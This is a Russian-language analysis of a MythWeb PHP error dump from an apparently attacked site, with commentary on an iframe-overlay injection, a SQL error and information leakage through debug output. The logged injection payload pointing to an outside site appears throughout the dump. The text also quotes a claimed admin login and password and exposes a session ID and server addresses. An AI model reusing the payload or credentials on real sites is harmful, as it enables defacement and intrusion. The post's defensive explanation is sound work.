Как выглядят данные на взломанном сайте на php?

Так выглядит отчёт, который PHP-обработчик ошибок MythWeb выдал на взломанном сайте. Автор связывает падение сайта с банальной XSS-атакой (в оригинале опечатка — «XXS»), но дамп показывает чуть другую картину: в поля поиска (`as[0]`, `airdate_start`, `airdate_end`) был подставлен HTML-фрагмент с `<iframe src=…fuck.ru>`, запрос вызвал синтаксическую ошибку MySQL #1064 (в тексте запроса видно пустое `IN ()` после `program.category_type`), а обработчик ошибок вместо короткого сообщения вернул полный отладочный дамп с `$_GET`, `$_SESSION`, `$_SERVER` и списком констант. Пользовательский ввод при этом попал в текст SQL-запроса без параметризации (см. условие `program.title LIKE '%<div…'`), так что утверждение автора о SQL-инъекциях правдоподобно, хотя в этом дампе успешной инъекции не показано; оценка «сайт пропускает 90% всех уязвимостей» ничем в отчёте не подтверждается. Итак, смотрим отчёт PHP:

datetime:  2010-12-29 12:53:53 (CET)
errornum:  256
error type:  User Error
error string:  SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL

server version for the right syntax to use near ‘) AND program.starttime>=’2010-12-29 12:53:53’ AND

program.endtime<=’2011-01-12 ‘ at line 13 [#1064]
filename:  /usr/share/mythtv/mythweb/classes/Database/Query/mysql.php
error line:  83

==========================================================================

Backtrace:

file:  /usr/share/mythtv/mythweb/classes/Database/Query/mysql.php
line:  83
class:
function:  trigger_error
type:
args:  Array
(
[0] => SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server

version for the right syntax to use near ‘) AND program.starttime>=’2010-12-29 12:53:53’ AND

program.endtime<=’2011-01-12 ‘ at line 13 [#1064]
[1] => 256
)

file:  /usr/share/mythtv/mythweb/classes/Database.php
line:  263
class:  Database_Query_mysql
function:  execute
type:  ->
args:  Array
(
[0] => Array ( )
)

file:  /usr/share/mythtv/mythweb/modules/tv/includes/programs.php
line:  166
class:  Database
function:  query
type:  ->
args:  Array
(
[0] => SELECT program.*,
UNIX_TIMESTAMP(program.starttime) AS starttime_unix,
UNIX_TIMESTAMP(program.endtime) AS endtime_unix,
IFNULL(programrating.system, "") AS rater,
IFNULL(programrating.rating, "") AS rating,
channel.callsign,
channel.channum
FROM program
LEFT JOIN programrating USING (chanid, starttime)
LEFT JOIN channel ON program.chanid = channel.chanid
LEFT JOIN credits ON (program.chanid = credits.chanid AND program.starttime =

credits.starttime)
LEFT JOIN people ON (credits.person = people.person)
WHERE program.chanid IN (1) AND (program.endtime > FROM_UNIXTIME('1293623633') AND program.starttime
< FROM_UNIXTIME('1296302033') AND program.starttime != program.endtime) AND ((program.title LIKE
'%<div%style=z%index:999;position:absolute;left:0;top:0;><iframe%frameborder=0%scrolling=no%src=https://fuck.ru%width=1400%height=3744></iframe></div>%')) AND (program.category_type IN () AND program.starttime>='2010-12-29 12:53:53'
AND program.endtime<='2011-01-12 12:53:53')
GROUP BY channel.callsign, program.chanid, program.starttime ORDER BY program.starttime
)

file:  /usr/share/mythtv/mythweb/modules/tv/search.php
line:  338
class:
function:  load_all_program_data
type:
args:  Array
(
[0] => 1293623633
[1] => 1296302033
[2] =>
[3] =>
[4] => ((program.title LIKE

‘%<div%style=z%index:999;position:absolute;left:0;top:0;><iframe%frameborder=0%scrolling=no%src=https://fuck.ru%width=

1400%height=3744></iframe></div>%’)) AND (program.category_type IN () AND program.starttime>=’2010-12-29 12:53:53′

AND program.endtime<=’2011-01-12 12:53:53′)
)

file:  /usr/share/mythtv/mythweb/modules/tv/handler.php
line:  87
class:
function:  require_once
type:
args:  Array
(
[0] => /usr/share/mythtv/mythweb/modules/tv/search.php
)

file:  /usr/share/mythtv/mythweb/mythweb.php
line:  35
class:
function:  require_once
type:
args:  Array
(
[0] => /usr/share/mythtv/mythweb/modules/tv/handler.php
)

==========================================================================

$_GET: Array
(
[type] => a
[af] => Array
(
[0] => Array
(
[0] => title
)

)

[as] => Array
(
[0] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no

src=https://fuck.ru width=1400 height=3744></iframe></div>
)

[starttime] => now
[endtime] => + 2 weeks
[airdate_start] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no

src=https://fuck.ru width=1400 height=3744></iframe></div>
[airdate_end] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no

src=https://fuck.ru width=1400 height=3744></iframe></div>
[categories] => Array
(
[0] => All
)

[search] => Search
)

==========================================================================

$_SESSION: Array
(
[language] => English
[prefer_channum] => 1
[date_statusbar] => %a %b %e, %Y, %I:%M %p
[date_scheduled] => %a %b %e, %Y (%I:%M %p)
[date_scheduled_popup] => %a %b %e, %Y
[date_recorded] => %a %b %e, %Y (%I:%M %p)
[date_search] => %a %b %e, %Y, %I:%M %p
[date_listing_key] => %a %b %e, %Y, %I:%M %p
[date_listing_jump] => %a %b %e, %Y
[date_channel_jump] => %a %b %e, %Y
[date_job_status] => %a %b %e, %Y, %I:%M %p
[time_format] => %I:%M %p
[recorded_pixmaps] => 1
[guide_favonly] =>
[timeslot_size] => 300
[num_time_slots] => 36
[timeslot_blocks] => 3
[timeslotbar_skip] => 20
[max_stars] => 4
[star_character] => &#9733;
[show_popup_info] => 1
[show_channel_icons] => 1
[sortby_channum] => 1
[recorded_paging] =>
[genre_colors] => 1
[show_video_covers] => 1
[settings] => Array
(
[screens] => Array
(
[tv] => Array
(
[upcoming recordings] => Array
(
[title] => on
[channel] => on
[record date] => on
[length] => on
)

)

)

)

[backend] => Array
(
[127.0.0.1] => Array
(
[proto_version] => Array
(
[last_check_version] => 23056
[last_check_time] => 1293623425
)

)

[timezone] => Array
(
[value] => Europe/Amsterdam
[last_check_time] => 1293623425
)

)

[tv] => Array
(
[last] => Array
(
[0] => search
)

)

[recorded_title] =>
[recorded_recgroup] =>
[recorded_sortby] => Array
(
[0] => Array
(
[field] => airdate
[reverse] => 1
)

[1] => Array
(
[field] => title
[reverse] =>
)

)

[] => Array ( )
[scheduled_recordings] => Array
(
[disp_scheduled] => 1
[disp_duplicates] => 1
[disp_deactivated] => 1
[disp_conflicts] => 1
[disp_recgroup] =>
[disp_title] =>
)

[video_sortby] => Array
(
[0] => Array
(
[field] => title
[reverse] =>
)

)

=> Array
(
[path] => /<div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no

src=https://fuck.ru width=1400 height=3744></iframe></div>
[browse] => -1
[VideoAdminPassword] => 1
)

[search] => Array
(
[type] => a
[s] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no

src=https://fuck.ru width=1400 height=3744></iframe></div>
[ctype] => Array ( )
[categories] => Array
(
[0] => All
)

[stars_gt] => 0
[stars_lt] => 0
[starttime] => now
[endtime] => + 2 weeks
[as] => Array
(
[0] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no

src=https://fuck.ru width=1400 height=3744></iframe></div>
)

[af] => Array
(
[0] => Array
(
[0] => title
)

)

[aj] => Array
(
[0] => AND
)

[hd] =>
[commfree] =>
[unwatched] =>
[scheduled] =>
[generic] =>
[airdate_start] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0

scrolling=no src=https://fuck.ru width=1400 height=3744></iframe></div>
[airdate_end] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0

scrolling=no src=https://fuck.ru width=1400 height=3744></iframe></div>
)

)

==========================================================================

$_SERVER: Array
(
[REDIRECT_STATUS] => 200
[HTTP_HOST] => 211.78.181.247
[HTTP_USER_AGENT] => Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13

(.NET CLR 3.5.30729)
[HTTP_ACCEPT] => text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
[HTTP_ACCEPT_LANGUAGE] => ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
[HTTP_ACCEPT_ENCODING] => gzip,deflate
[HTTP_ACCEPT_CHARSET] => windows-1251,utf-8;q=0.7,*;q=0.7
[HTTP_KEEP_ALIVE] => 115
[HTTP_CONNECTION] => keep-alive
[HTTP_REFERER] =>

https://211.78.181.247/mythweb/tv/search?type=q&s=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%

3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fifram

e%3E%3C%2Fdiv%3E&search=Search
[HTTP_COOKIE] => mythweb_tmpl=default; mythweb_skin=default; mythweb_id=gir24tta61fkc6rto1tk8b4m95
[PATH] => /usr/local/bin:/usr/bin:/bin
[SERVER_SIGNATURE] => <address>Apache/2.2.16 (Ubuntu) Server at 211.78.181.247 Port 80</address>

[SERVER_SOFTWARE] => Apache/2.2.16 (Ubuntu)
[SERVER_NAME] => 211.78.181.247
[SERVER_ADDR] => 192.168.123.11
[SERVER_PORT] => 80
[REMOTE_ADDR] => 195.110.239.64
[DOCUMENT_ROOT] => /var/www
[SERVER_ADMIN] => webmaster@localhost
[SCRIPT_FILENAME] => /var/www/mythweb/mythweb.php
[REMOTE_PORT] => 1452
[REDIRECT_QUERY_STRING] =>

type=a&af%5B0%5D%5B0%5D=title&as%5B0%5D=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3B%3E

%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fiframe%3E%3C%2

Fdiv%3E&starttime=now&endtime=%2B+2+weeks&airdate_start=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0

%3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%

2Fiframe%3E%3C%2Fdiv%3E&airdate_end=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3B%3E%3Ci

frame+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fiframe%3E%3C%2Fdiv

%3E&categories%5B%5D=All&search=Search
[REDIRECT_URL] => /mythweb/tv/search
[GATEWAY_INTERFACE] => CGI/1.1
[SERVER_PROTOCOL] => HTTP/1.1
[REQUEST_METHOD] => GET
[QUERY_STRING] =>

type=a&af%5B0%5D%5B0%5D=title&as%5B0%5D=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3B%3E

%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fiframe%3E%3C%2

Fdiv%3E&starttime=now&endtime=%2B+2+weeks&airdate_start=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0

%3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%

2Fiframe%3E%3C%2Fdiv%3E&airdate_end=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3B%3E%3Ci

frame+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fiframe%3E%3C%2Fdiv

%3E&categories%5B%5D=All&search=Search
[REQUEST_URI] =>

/mythweb/tv/search?type=a&af%5B0%5D%5B0%5D=title&as%5B0%5D=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%

3A0%3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%

3C%2Fiframe%3E%3C%2Fdiv%3E&starttime=now&endtime=%2B+2+weeks&airdate_start=%3Cdiv+style%3Dz-index%3A999%3Bposition%3A

absolute%3Bleft%3A0%3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+h

eight%3D3744%3E%3C%2Fiframe%3E%3C%2Fdiv%3E&airdate_end=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%

3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2

Fiframe%3E%3C%2Fdiv%3E&categories%5B%5D=All&search=Search
[SCRIPT_NAME] => /mythweb/mythweb.php
[PATH_INFO] => /tv/search
[PATH_TRANSLATED] => /var/www/tv/search
[PHP_SELF] => /mythweb/mythweb.php/tv/search
[REQUEST_TIME] => 1293623632
[STATUS] => 200
[URL] => /mythweb/tv/search
[HTTP_PORT] => 80
)

==========================================================================

$constant_list[«user»]: Array
(
[ERROR] => 512
[E_ASSERT_ERROR] => 4096
[FATAL] => 256
[PHP_MIN_VERSION] => 5.1
[WARNING] => 1024
[WebDBSchemaVer] => 2
[dupsin_all] => 15
[dupsin_ex_generic] => 64
[dupsin_ex_repeats] => 32
[dupsin_newepisodes] => 16
[dupsin_oldrecorded] => 2
[dupsin_recorded] => 1
[error_email] =>
[gb] => 1073741824
[hostname] => display-desktop
[http_host] => 211.78.181.247
[kb] => 1024
[max_stars] => 4
[mb] => 1048576
[module] => tv
[modules_path] => ./modules
[num_time_slots] => 36
[prefer_channum] => 1
[rectype_always] => 4
[rectype_channel] => 3
[rectype_daily] => 2
[rectype_dontrec] => 8
[rectype_finddaily] => 9
[rectype_findone] => 6
[rectype_findweekly] => 10
[rectype_once] => 1
[rectype_override] => 7
[rectype_weekly] => 5
[root] => /mythweb/
[root_url] => https://211.78.181.247/mythweb/
[searchtype_keyword] => 3
[searchtype_manual] => 5
[searchtype_people] => 4
[searchtype_power] => 1
[searchtype_title] => 2
[skin] => default
[skin_img_url] => https://211.78.181.247/mythweb/skins/default/img/
[skin_url] => https://211.78.181.247/mythweb/skins/default/
[star_character] => &#9733;
[stream_url] => https://211.78.181.247:80//mythweb/
[tb] => 1099511627776
[timeslot_blocks] => 3
[timeslot_size] => 300
[timeslotbar_skip] => 20
[tmpl] => default
[tmpl_dir] => modules/tv/tmpl/default/
)

Далее автор утверждает, что отсюда удалось взломать базу данных сайта и получить пароль администратора (l:admin p:creator2000), что взломанный сервер теперь находится под контролем хакеров и что с помощью эксплоита на сервере FreeBSD получены права root. Ничто в приведённом дампе эти утверждения не подтверждает: в нём нет ни учётных данных, ни результата инъекции, а `SERVER_SOFTWARE` показывает Apache/2.2.16 (Ubuntu), а не FreeBSD. Что дамп действительно раскрывает — и это само по себе уязвимость класса «утечка информации через сообщения об ошибках» (CWE-209): внутренний адрес сервера (`SERVER_ADDR` 192.168.123.11) за внешним 211.78.181.247, имя хоста `display-desktop`, версии Apache и ОС, пути к файлам на диске (`/usr/share/mythtv/mythweb/…`, `/var/www`), имена и значения всех параметров сессии и идентификатор сессии из cookie `mythweb_id` (для запросившего это его собственная сессия, но если такой отчёт попадает в общедоступный лог или пересылается по почте через `error_email`, утекают и чужие). Практический вывод: в продакшене вывод ошибок клиенту должен быть выключен, отладочный дамп — оставаться только в серверном логе, а пользовательский ввод должен попадать в SQL только через параметризованные запросы.
